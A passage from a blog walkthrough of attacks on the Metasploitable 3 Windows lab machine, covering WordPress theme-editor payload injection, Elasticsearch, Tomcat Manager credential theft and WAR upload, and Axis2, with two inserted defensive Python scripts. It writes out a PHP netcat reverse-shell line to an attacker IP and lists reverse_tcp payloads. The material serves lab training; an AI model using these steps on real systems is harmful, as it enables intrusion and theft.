<p>Log in to WordPress using either <b><em>admin/sploit</em></b> or <b><em>vagrant/vagrant</em></b> and open <b><em>Appearance &gt; Editor</em></b>.<p><a href="https://drive.google.com/uc?id=1GrCO_tQIUs20omRDutFAZH3P51KiZWFx" target="_blank"><img width="681" height="499" title="Accessing the WordPress Editor" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the WordPress Editor" src="https://drive.google.com/uc?id=1gG9uBmWYAZ8jTyVqcW29p8vP4KpoAC3e" border="0"></a><p>On the right side, select a PHP file, preferably <b><em>header.php</em></b>.<p><a href="https://drive.google.com/uc?id=1xnXUMKMD6kahcbLQ_5Lj2hpZQalzFmlV" target="_blank"><img width="368" height="445" title="Selecting the header.php script" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting the header.php script" src="https://drive.google.com/uc?id=1jm7UgkO5pVPcTLLIkCSBqfSN40zxDWlN" border="0"></a><p>You will see the PHP code for that page:<p><a href="https://drive.google.com/uc?id=1qrfPtGS-dvAkU9ZittHiYvAMuAZyI2t7" target="_blank"><img width="656" height="145" title="Header.php code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Header.php code" src="https://drive.google.com/uc?id=1gBd0z3LUKkPNx2ftNi2OFFY4VqtH974t" border="0"></a><h4>Exploiting WordPress using Metasploit</h4><p>To open a Meterpreter shell, create a proper payload with MSFvenom:</p><p><a href="https://drive.google.com/uc?id=1lp9uKxDaiT90uJQEGzNSKdmZ4L4e8JnT" target="_blank"><img width="806" height="114" title="Creating a payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a payload" src="https://drive.google.com/uc?id=1TUjrUzThUnf9zzfQ-P5Sq0SW78y5ts65" border="0"></a><p>Open the generated payload and adjust the code, uncommenting the beginning and adding the proper closing PHP tag at the end:<p><a href="https://drive.google.com/uc?id=1oLIjE_rJ1l4hAf-Zwnio9mUHPUg0G--2" target="_blank"><img width="778" height="285" title="Adjusting the payload's PHP code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Adjusting the payload's PHP code" src="https://drive.google.com/uc?id=1GMZZlEJ7tg1hcMPwxwqWsfb7Ob1SnBBm" border="0"></a><p>Now insert this code at the top of the <b><em>header.php</em></b> code editor:<p><a href="https://drive.google.com/uc?id=1lSCZH3lp-SrfY5U4a0UKLYDigUEHr518" target="_blank"><img width="761" height="568" title="Inserting the payload code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Inserting the payload code" src="https://drive.google.com/uc?id=1jUiTaNZjWpiv3KEPQgf0_0mCY88f3_YX" border="0"></a><p>Press the <b><em>Update File</em></b> button.<p><a href="https://drive.google.com/uc?id=1toIwp3pmYwcd-R2UtaxxjzE8oBiWQaKK" target="_blank"><img width="413" height="163" title="Saving the altered code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Saving the altered code" src="https://drive.google.com/uc?id=13Wiuzt7YoyWtcNCfOW0pP9obVdwdg5Vg" border="0"></a><p>Now, set up a listener on the Kali machine, ready to receive the incoming connection:<p><a href="https://drive.google.com/uc?id=138N-G47zUiuAN_-sSJqrM9BrVeJ22Rit" target="_blank"><img width="806" height="183" title="Starting a Metasploit listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener" src="https://drive.google.com/uc?id=1v3XgZWZs717rCGna7xqxUc1OtCuYn0Uc" border="0"></a><p>Go back to your browser and reload the WordPress homepage:<p><a href="https://drive.google.com/uc?id=18sRTA9oVtYrGerEjf6Xw-6Q4x2ZoTFAY" target="_blank"><img width="569" height="147" title="Reloading the WordPress page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Reloading the WordPress page" src="https://drive.google.com/uc?id=1jEBCMIcIkb9ifdgDV6Z6rvlAaSjJkJ4g" border="0"></a><p>And you have a shell to the target machine.<p><a href="https://drive.google.com/uc?id=1Cu_N21NT7a9k8Dq6YjKjNZIjnFATBAdK" target="_blank"><img width="806" height="106" title="Meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter shell" src="https://drive.google.com/uc?id=1CjpVv9sVikkc80CBXYmVIe0zro2_nPp8" border="0"></a></p><h4>Exploiting WordPress using Netcat</h4><p>If the target machine has Netcat or a similar tool installed, it can be used to open a simple reverse shell.<p>Add the following code to the page, using Kali’s IP and listener port:<p><strong><em>&lt;?php echo shell_exec("nc.exe 172.16.1.6 5555 -e cmd.exe"); ?&gt;</em></strong><p><a href="https://drive.google.com/uc?id=1pvjQR5nl7HljKTgJF1hojDDJGnXMOB6I" target="_blank"><img width="663" height="181" title="Adding the command to open a reverse shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Adding the command to open a reverse shell" src="https://drive.google.com/uc?id=1TuiktFLDqzoOe7E9tXpUh5RpBB_Gjqag" border="0"></a><p>Press the <b><em>Update File</em></b> button.<p><a href="https://drive.google.com/uc?id=1nGmMqrNEb6mtxhjssNQMTmgKCt85IGF-" target="_blank"><img width="413" height="163" title="Saving the altered code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Saving the altered code" src="https://drive.google.com/uc?id=1sjEz46gu5aiUVf1M1Noi35f1fNN0IczD" border="0"></a><p>Now set up a Netcat listener on Kali:<p><a href="https://drive.google.com/uc?id=14VkyUUI0-mM43AelBc_ubV6p6aPt__Zc" target="_blank"><img width="502" height="105" title="Starting a Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Netcat listener" src="https://drive.google.com/uc?id=1mEjz-hRZwvqTSfEZqwq4CZzz5qT4w7gN" border="0"></a><p>Now, reloading the WordPress homepage in the browser will run the Netcat (or clone) command and open a reverse connection to Kali.<h2>Exploiting Port 9200 – Elasticsearch</h2><p>Elasticsearch is a real-time, distributed, open source full-text search and analytics engine, and it is known to have a couple of Remote Code Execution vulnerabilities. Start by accessing Metasploitable3’s IP address on port 9200:<p><a href="https://drive.google.com/uc?id=14uGfjoPL25BTNTieIKnl6-bIBBj2Wkg0" target="_blank"><img width="573" height="402" title="Elasticsearch start page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Elasticsearch start page" src="https://drive.google.com/uc?id=1yzfhuToejHI5zjA3c46iduLCs1ptnhCo" border="0"></a><h3>Enumerating Elasticsearch using Metasploit</h3><p>There is a Metasploit module to get information about the service:<p><a href="https://drive.google.com/uc?id=10mSTStBXwMZovsaI5E9voD-ZSubgcVzY" target="_blank"><img width="806" height="172" title="Enumerating Elasticsearch with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Elasticsearch with Metasploit" src="https://drive.google.com/uc?id=1AG7m0QQUAwbv_t6eJkB0QVMqjSrHe5Gr" border="0"></a><p>You can even get files from the target machine:<p><a href="https://drive.google.com/uc?id=1c7cjAOHLfAqRoWhHn1rDIURH5C6QT1au" target="_blank"><img width="806" height="161" title="Enumerating Elasticsearch with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Elasticsearch with Metasploit" src="https://drive.google.com/uc?id=1zRHw5dfGyxUGuUT-O8qUVBH9BNOEAwsj" border="0"></a><h3>Exploiting Elasticsearch using Metasploit</h3><p>Metasploit also has a module to exploit a vulnerability present in this version (1.1.1) of the service:<p><a href="https://drive.google.com/uc?id=1BSidyDrYq3nJucCitu8s1ykSRw7nq1YU" target="_blank"><img width="806" height="285" title="Exploiting Elasticsearch with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Elasticsearch with Metasploit" src="https://drive.google.com/uc?id=1pCDg_rGjNUhDRPJXkurFLQmP-ri4OAqP" border="0"></a></p><p><strong>Next post</strong>: <a title="Metasploitable 3 Ubuntu Walkthrough: Part I" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-ubuntu-walkthrough.html">Metasploitable 3 Ubuntu Walkthrough: Part I</a></p><p><strong>Metasploitable 3 Windows Walkthrough: Part IX</strong> (Rui Natário, published 2020-11-05, updated 2020-11-21)</p><h2>Exploiting Port 8282 – Apache Tomcat</h2><p>Apache Tomcat provides software to run Java applets in the browser. Coyote is a stand-alone web server that provides servlets to Tomcat applets. That is, it functions like the Apache web server, but for Java Server Pages (JSP). In practice, this means that web pages accessed through port 8282 are assembled by a Java web application. 
<p>There are many Metasploit modules available for Tomcat, so you should focus on your goals:<ul><li>Survey the website<ul><li>Exploit possible vulnerable pages</li></ul></li><li>Obtain credentials</li><li>Deploy payload</li></ul><p><a href="https://drive.google.com/uc?id=1HZmudnUURfFdIAVJwOCfNmmUXeCdKS90" target="_blank"><img width="806" height="322" title="Apache Tomcat entry page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Apache Tomcat entry page" src="https://drive.google.com/uc?id=1AfGivFGieqL5p6hgCR29Qj6WnL39OZ2y" border="0"></a></p><p>A web service like this might have multiple entry points and multiple valid credentials.</p><h3>Surveying Apache Tomcat using Metasploit</h3><p>Apart from the initial page, there might be other interesting pages with other points of entry:<p><a href="https://drive.google.com/uc?id=1CwHgg3W6HUTZ80d2ipCJIs_ZOdKMcn-I" target="_blank"><img width="806" height="216" title="Surveying Apache Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Surveying Apache Tomcat with Metasploit" src="https://drive.google.com/uc?id=1-AGy_QTEEc5O4IEF1mYdxYvApZtB2FPE" border="0"></a><p>This turns up some interesting pages that can potentially be exploited, namely <strong><em>/manager</em></strong> and <strong><em>/axis2</em></strong>.<h3>Brute forcing Apache Tomcat using Metasploit</h3><p>Try to brute force your way in using the Metasploit module:<p><a href="https://drive.google.com/uc?id=1HWEgFXyUTZ40agO65Ez86uZMl6a7gHJI" target="_blank"><img width="806" height="159" title="Brute forcing Apache Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Apache Tomcat with Metasploit" src="https://drive.google.com/uc?id=1oNBj_yUHROdrlnWV5tbn0DYhNaDRyXtM" border="0"></a><p>The Tomcat credentials are not the default ones. 
Therefore, you must try something else.<p>Try to log in to the Manager App:<p><a href="https://drive.google.com/uc?id=1xGy2Y86t00cWgkZSzUpZ3rfEbkjc48J4" target="_blank"><img width="806" height="187" title="Accessing the Tomcat Manager App" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the Tomcat Manager App" src="https://drive.google.com/uc?id=1s0_DLpijGg08JjXx8-XJpghcdax2FDuL" border="0"></a><p>You will be prompted for the credentials:<p><a href="https://drive.google.com/uc?id=1mrogOfo9jwYbfDyj9zNh9RMFzGVNqC3-" target="_blank"><img width="806" height="219" title="Accessing the Tomcat Manager App" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the Tomcat Manager App" src="https://drive.google.com/uc?id=1Uv3Vx2b1YkI3GfO8HTqyc86evxbizBtV" border="0"></a><p>Now just press “Cancel” and you will see a <b><em>401</em></b> page with some very interesting information:<p><a href="https://drive.google.com/uc?id=16jKEZRIwaRu5vY_Q45m3cG_8PnAgE5e5" target="_blank"><img width="806" height="410" title="Accessing the Tomcat Manager App" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the Tomcat Manager App" src="https://drive.google.com/uc?id=1gTU51UXJxt6_C_mY4C8NKJiBFNqZP4Ut" border="0"></a><p>So, the Tomcat server is telling you exactly where to find the valid credentials to log in to the Manager App: a file named <b><em>tomcat-users.xml</em></b>.<p>So, all you have to do is read that file to gain proper access to the Tomcat server.
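<p>A defender reading the same file should ask the questions this walkthrough answers for the attacker: who holds a Manager role, and are their passwords weak or equal to the username? The following script is an added example and is not code from the post or from the Tomcat project. It parses a constructed <b><em>tomcat-users.xml</em></b> modelled on the one above (a sploit/sploit account with Manager roles) and reports the accounts a reviewer should care about; the role names are Tomcat's own, the weak-password list and the 12-character minimum are assumptions.</p>

```python
"""Audit tomcat-users.xml for weak or over-privileged Manager accounts.

Added example for this walkthrough; not code from the post or from the
Tomcat project. The XML below is constructed to resemble the file the post
reads off the Metasploitable 3 target; the role names are Tomcat's own.
"""
import xml.etree.ElementTree as ET

# Roles that let a user deploy applications through the Manager, i.e. run
# code on the server. These are the roles the post's WAR upload relies on.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}

# Passwords that should never survive in a production file ("s3cret" is the
# value used in Tomcat's own documentation examples). Assumed list.
WEAK_PASSWORDS = {"", "tomcat", "s3cret", "admin", "password", "manager"}

# Constructed sample: the sploit/sploit account mirrors the post, the
# other two accounts are made up.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="probe"/>
  <user username="sploit" password="sploit" roles="manager-gui,manager-script"/>
  <user username="monitor" password="b9kTqZ2!x7Lw" roles="probe"/>
  <user username="deployer" password="s3cret" roles="manager-script"/>
</tomcat-users>
"""


def parse_users(xml_text):
    """Return (username, password, roles) tuples from a tomcat-users.xml body."""
    users = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.split("}")[-1] != "user":   # strip the namespace, if any
            continue
        # Tomcat accepts both the 'username' and the older 'name' attribute.
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        users.append((name, password, roles))
    return users


def audit(xml_text, min_length=12):
    """Return (username, finding) pairs for every account worth a second look."""
    findings = []
    for name, password, roles in parse_users(xml_text):
        if password.lower() == name.lower():
            findings.append((name, "password equals username"))
        elif password in WEAK_PASSWORDS:
            findings.append((name, "password is in the weak/default list"))
        elif len(password) < min_length:
            findings.append((name, f"password shorter than {min_length} characters"))
        privileged = roles & MANAGER_ROLES
        if privileged:
            findings.append((name, "holds Manager role(s): " + ",".join(sorted(privileged))))
    return findings


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

<p>Tomcat stores the password attribute in clear text unless a CredentialHandler is configured on the Realm, in which case the attribute holds a hash and the length and weak-list checks above no longer apply. Either way, the file is only as safe as the host's access controls: as the post shows, a shell obtained through any other service reads it directly, so the Manager should not be reachable from untrusted networks and its accounts should not reuse credentials from elsewhere.</p>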
<p>Using a shell from another exploit, browse to:<p><strong><em>C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf</em></strong><p><a href="https://drive.google.com/uc?id=1up4eBKqlxwGGhKoPRjo1pee8bkUy_rkL" target="_blank"><img width="806" height="261" title="Getting Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting Tomcat credentials" src="https://drive.google.com/uc?id=1pU0hlzZjWr9zPJYx1lJm4B6I_fVngwuG" border="0"></a><p>Now examine the contents of the file <b><em>tomcat-users.xml</em></b>.<p><a href="https://drive.google.com/uc?id=1Yvm_cXZIUg2Piyx_R04oSjUEHIzoELTs" target="_blank"><img width="796" height="651" title="Getting Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting Tomcat credentials" src="https://drive.google.com/uc?id=1GleAXTeTcUqVtbNFTAMvmCRQotgLV93N" border="0"></a><p>This reveals the username and password to be “<b><em>sploit/sploit</em></b>”.<h3>Enumerating Apache Tomcat using Metasploit</h3><p>The Metasploit module will enumerate the available usernames:<p><a href="https://drive.google.com/uc?id=1vHVfgAHYVdZFtQoNZFEgY31qxTxsBnOS" target="_blank"><img width="806" height="368" title="Enumerating Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Tomcat with Metasploit" src="https://drive.google.com/uc?id=1L87shqcSleRjgQSGa36JUdcBkdlW2OOc" border="0"></a><p>Obtaining a remote shell on this web server will require uploading and executing a file, but for Tomcat the executable must be a JSP (Java Server Pages) application.</p><h3>Exploiting Apache Tomcat using Metasploit</h3><p>This is solved by the <b><em>tomcat_mgr_upload</em></b> module:<p><a href="https://drive.google.com/uc?id=1GUr1HXs3LFJHszSd7kBfKaWri80e_lh1" target="_blank"><img width="806" height="339" title="Exploiting Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with Metasploit" src="https://drive.google.com/uc?id=1kOGnwVtX_uArtF5FbNjk6UcA6WGKBY8m" border="0"></a><p>This is a low privilege shell because it used the default Java target and payload.<p>But using this module you can also get a system shell:<p><a href="https://drive.google.com/uc?id=1y4PFWnWUGLZqq0_vQtgJCM1LoPLJmH0O" target="_blank"><img width="806" height="366" title="Exploiting Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with Metasploit" src="https://drive.google.com/uc?id=1Pg8smpOaXNEQV7D7FzhYob0q2G0SKbkG" border="0"></a><p><em><b>NOTE</b>:</em> With this module you can get at least two meterpreter system shells and two system command shells, depending on the payload you use:<ul><li>windows/meterpreter/reverse_tcp</li><li>windows/meterpreter_reverse_tcp</li><li>windows/shell/reverse_tcp</li><li>windows/shell_reverse_tcp</li></ul><h3>Exploiting Apache Tomcat manually</h3><p>If, for some reason, the Metasploit automated payload deployment fails, you can still exploit this server manually.<p>The management web interface gives us a place to upload <b><em>WAR</em></b> files, and a way to execute them manually.<p><b><em>.war</em></b> files are Web ARchive files that contain all the files needed for a Java based web application. These are the files used by the Metasploit modules.<p>Using <b>msfvenom</b>, you can create shellcode and then specify what type of file to send it to.
It just so happens that one of the file types msfvenom supports is .war.<p>Use msfvenom to craft a WAR file with the payload, then manually upload and execute it.<ul><li>Kali IP: 172.16.1.6</li><li>Kali port: 5555</li></ul><p><a href="https://drive.google.com/uc?id=1ek6tPUILyT8hvTKy3QHSIzorz6ZDTJR4" target="_blank"><img width="806" height="138" title="Creating a payload with msfvenom" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a payload with msfvenom" src="https://drive.google.com/uc?id=1-bOZ2_hdsBgZxIoEAxJaQIhJMMOTwmEH" border="0"></a></p><p>Access the manager at <b><em>[Target IP]:8282/manager/html</em></b>. You will be asked for credentials, but that is not a problem; just enter sploit/sploit.<p>Select the file you just created and deploy it.<p><a href="https://drive.google.com/uc?id=1nNgfTwMtXyZbcABwQJvV7qCdadDAMS7W" target="_blank"><img width="806" height="550" title="Uploading the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload" src="https://drive.google.com/uc?id=1EBJYZEN_vs_xXh848ZmhVsfvliQ-b2zG" border="0"></a><p>Note that this does NOT execute the payload yet!!!
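<p>The upload and launch steps of this manual route leave two distinct entries in Tomcat's access log, which is what a defender should be alerting on. The script below is an added example, not code from the post or from Tomcat: it reads lines in the AccessLogValve "common" pattern, flags requests to the Manager's upload (HTML interface) and deploy (text interface) endpoints, and then flags the first request to any context path not in a baseline, linking it to a preceding deploy from the same client. The log lines, addresses, CSRF nonce and the <em>runme</em>/<em>.jsp</em> names are constructed for the example.</p>

```python
"""Spot WAR deployments through the Tomcat Manager in an access log.

Added example for this walkthrough; not code from the post or from Tomcat.
It reads lines in Tomcat's "common" AccessLogValve format and flags the two
steps the post performs by hand: an upload/deploy request to the Manager,
followed by the first request to a brand-new context path from the same
client. The log lines below are constructed; IPs and timestamps are made up.
"""
import re
from collections import defaultdict

# %h %l %u %t "%r" %s %b  (Tomcat AccessLogValve pattern="common")
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that deploy code to the server.
DEPLOY_ENDPOINTS = (
    ("POST", "/manager/html/upload"),   # HTML manager upload form
    ("PUT", "/manager/text/deploy"),    # text (script) interface
    ("PUT", "/manager/deploy"),         # older Tomcat text interface
)

# Contexts that exist before the log window starts (constructed baseline).
KNOWN_CONTEXTS = {"", "manager", "docs", "examples", "axis2", "struts2-rest-showcase"}

# Constructed log excerpt: a benign client and one client that logs in to
# the Manager, uploads a WAR and then requests the JSP inside it.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Nov/2020:15:20:11 -0800] "GET /docs/ HTTP/1.1" 200 7181
172.16.1.6 - - [05/Nov/2020:15:25:02 -0800] "GET /manager/html HTTP/1.1" 401 2473
172.16.1.6 - sploit [05/Nov/2020:15:25:09 -0800] "GET /manager/html HTTP/1.1" 200 19322
172.16.1.6 - sploit [05/Nov/2020:15:26:40 -0800] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 19540
172.16.1.6 - - [05/Nov/2020:15:27:03 -0800] "GET /runme/xfqtkgbl.jsp HTTP/1.1" 200 -
10.0.0.5 - - [05/Nov/2020:15:28:00 -0800] "GET /examples/servlets/ HTTP/1.1" 200 6300
"""


def parse(line):
    """Parse one common-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # The context is the first path segment, ignoring any query string.
    bare = rec["path"].split("?", 1)[0]
    rec["context"] = bare.split("/")[1] if "/" in bare else ""
    return rec


def detect(log_text, known_contexts=KNOWN_CONTEXTS):
    """Return alert strings for Manager deploys and first hits on unknown contexts."""
    alerts = []
    seen = set(known_contexts)
    deployers = defaultdict(list)   # client host -> times of its deploy requests
    for raw in log_text.splitlines():
        rec = parse(raw)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        for method, endpoint in DEPLOY_ENDPOINTS:
            if rec["method"] == method and path.startswith(endpoint):
                deployers[rec["host"]].append(rec["time"])
                alerts.append(f"DEPLOY {rec['host']} user={rec['user']} {method} {path} at {rec['time']}")
        ctx = rec["context"]
        if ctx not in seen:
            seen.add(ctx)
            suffix = " after a deploy from the same host" if deployers.get(rec["host"]) else ""
            alerts.append(f"NEW-CONTEXT /{ctx} first requested by {rec['host']} ({rec['path']}){suffix}")
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

<p>The baseline of known contexts is the piece that makes this work in practice: seed it from the server's <em>webapps</em> directory at deployment time, and any context that appears in the log without a corresponding change ticket is a deployment someone did by hand, exactly as above.</p>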
You need to unpack the <b><em>.war</em></b> to get the filename of the corresponding <b><em>.jsp</em></b> file:<p><a href="https://drive.google.com/uc?id=1l28wrt1d_EDF61aJ20qWtd3-4ZWZC-qk" target="_blank"><img width="806" height="188" title="Unpacking the .war file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Unpacking the .war file" src="https://drive.google.com/uc?id=1nkLcFL6QEOwO1P8KTzicHijg4zDw-qwJ" border="0"></a><p>Use Netcat to receive the incoming shell once the WAR file is executed.<p><a href="https://drive.google.com/uc?id=1AfvLKboCtG1Q0WnvnGsr8QRVjqjC758V" target="_blank"><img width="420" height="146" title="Starting a Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Netcat listener" src="https://drive.google.com/uc?id=16udETUeXCBxVRSFrOPH5MtJjr1Hi6oBt" border="0"></a><p>To execute the payload and run the actual .war file, you will need to visit the page:<p><strong><em>http://[Target IP]:8180/runme/[Name of file.jsp]</em></strong><p>Run the applet/exploit in your browser:<p><a href="https://drive.google.com/uc?id=1Wj7FUeG6R13-UMV9kWEuOMtzoFjxg7Ci" target="_blank"><img width="628" height="123" title="Running the payload on the browser" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the payload on the browser" src="https://drive.google.com/uc?id=1tyZj10nljbJZC--5d53zIJSAuORL_wKN" border="0"></a><p>And you will have a shell:<p><a href="https://drive.google.com/uc?id=1GOAdyfeGvjPPMnRseiLsKDt9jlI1-5si" target="_blank"><img width="806" height="222" title="Netcat shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Netcat shell" src="https://drive.google.com/uc?id=1HMQ2_yz2_2Trru7NTFeJbOXfb16BiQiY" border="0"></a><p><b>NOTE</b>: You can also set up a listener using Metasploit’s multi handler module.<p><a href="https://drive.google.com/uc?id=1JH-iLx4mENvy1228u3JfZ8cOKGm_2FU7" target="_blank"><img width="806" height="260" title="Metasploit command shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploit command shell" src="https://drive.google.com/uc?id=1eJEYq83skm1VWTDq7CXTA4CaBgepS0s-" border="0"></a><p>The advantage of using Metasploit is the possibility of upgrading the session from a command shell to meterpreter.<p>But sometimes this is just not possible.<p><a href="https://drive.google.com/uc?id=1UcFPX_z4bEaT2QaWiHjZShbUdATM1T8p" target="_blank"><img width="806" height="119" title="Failed shell upgrade" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed shell upgrade" src="https://drive.google.com/uc?id=1bwvyqvGAKJdUHNEWwJ0TnOwm7VM1b62c" border="0"></a><p>But you can try to open a meterpreter session directly:<p><a href="https://drive.google.com/uc?id=1QdgAePIWlcqrmMtrhh2gz7NIIBlSZDDo" target="_blank"><img width="806" height="108" title="Creating a new payload with msfvenom" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a new payload with msfvenom" src="https://drive.google.com/uc?id=1e8c70B0btVt0aCMJPeYY1GBFntPEFPEe" border="0"></a><p><a href="https://drive.google.com/uc?id=1fj-fvYy33CggtYyfX3sbWQD4jRTtxziG" target="_blank"><img width="700" height="154" title="Unpacking the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Unpacking the payload" src="https://drive.google.com/uc?id=10wDW4n-6tBah4Zm4GhVUR-hCBd_IVCfJ" border="0"></a><p><a href="https://drive.google.com/uc?id=1MTW6gAHxiqtWEqBowqINjcoJ8oL0OJZ_" target="_blank"><img width="607" height="108" title="Uploading the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload" src="https://drive.google.com/uc?id=1Hy8ONekHAKC2yPIqQw3KNvxcUJOIjcG-" border="0"></a><p>Start the Metasploit handler using the same payload as the one you used in msfvenom:<p><a href="https://drive.google.com/uc?id=1K0w9EIer5RSYMgnVvMB7UGvgTemDe1iA" target="_blank"><img width="806" height="157" title="Starting a Metasploit listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener" src="https://drive.google.com/uc?id=16EVo9oMxCUdmJvtKG-Db_UXp1wVSIh5L" border="0"></a><p><a href="https://drive.google.com/uc?id=1jK2Zk-vYtng5U_gSEkywxktX3g4sKtTh" target="_blank"><img width="643" height="102" title="Running the Java payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the Java payload" src="https://drive.google.com/uc?id=19omRRL-XPjpQIHrthFC9o2E-CDAOyROP" border="0"></a><p><a href="https://drive.google.com/uc?id=15JYalkpKGjL5giBrY334dRp4rbTKngP1" target="_blank"><img width="806" height="80" title="Meterpreter system shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter system shell" src="https://drive.google.com/uc?id=1MTVGdpRQ3W9d_eDkr3XXXeE1TMiEZYQ6" border="0"></a><p>And you will have a high privilege meterpreter shell.<h4>Cleaning</h4><p>Remove the .war files by going back to <b><em>[Target IP]:8282/manager/html</em></b> and clicking "<strong><em>Undeploy</em></strong>".<h2>Exploiting Port 8282 – Apache Axis2</h2><p>Apache Axis2 is a core engine for Web services. It is a complete re-design and re-write of the widely used Apache Axis SOAP stack. You access the service from the Tomcat manager page:<p><a href="https://drive.google.com/uc?id=1hBcqPE41O5Aty-F64HW0wSxMb4BpHYF6" target="_blank"><img width="806" height="305" title="Accessing Apache Axis2" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Apache Axis2" src="https://drive.google.com/uc?id=1y_Icln94iXj_rr0bZZ3ixRTSbfWyafQ1" border="0"></a><p>That link will open the general service page.
From here you can access the Administration page:<p><a href="https://drive.google.com/uc?id=1h1Ye80ThBERk-OVbuc3hpPuqMwKx9owL" target="_blank"><img width="806" height="345" title="Accessing Apache Axis2" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Apache Axis2" src="https://drive.google.com/uc?id=1kNgm_NgLYMvBGmK4flA82rmUXORJnx3s" border="0"></a><p><a href="https://drive.google.com/uc?id=1f2sdRgXG7aAxMSW4QxF9CEX65MXzNW-u" target="_blank"><img width="804" height="297" title="Accessing Apache Axis2" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Apache Axis2" src="https://drive.google.com/uc?id=1uI3SHQj4Bk2A6upHM4fSo94ljZZYkNLf" border="0"></a><h3>Brute forcing Axis2 using Metasploit</h3><p>Try to brute force the credentials:<p><a href="https://drive.google.com/uc?id=1vzWpND4XBVHOVXljWjCBNHUBK-OKOufd" target="_blank"><img width="806" height="337" title="Brute forcing Axis2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Axis2 with Metasploit" src="https://drive.google.com/uc?id=1CLbCHUXRNsurUdPHrh_7nRhe9sg_t9S4" border="0"></a><p>Now you have a valid set of credentials to log in and manage the Apache Axis2 service.<h3>Exploiting Axis2 using Metasploit</h3><p>Another possible approach is to exploit the service using the previously found credentials and a Metasploit module.<p><a href="https://drive.google.com/uc?id=1Tr-tvseSYjam0eqIX5X9hHi1wa2sBkb8" target="_blank"><img width="806" height="297" title="Exploiting Axis2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Axis2 with Metasploit" src="https://drive.google.com/uc?id=1T9RC-S5A0hQsovMbp6YBCjIddTxFSGT1" border="0"></a><p>Using the default module settings, you will get a low privilege meterpreter session.<p><b>NOTE</b>: If you have found valid credentials and they were added to the workspace database, the module will load them automatically.<h2>Exploiting Port 8282 – Apache Struts2</h2><p>Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller architecture.<p><a href="https://drive.google.com/uc?id=1ENdh6YlJnQX0Japz3kLBBEAIyndXbUNk" target="_blank"><img width="806" height="280" title="Accessing Apache Struts2" style="margin: 0px auto; float: 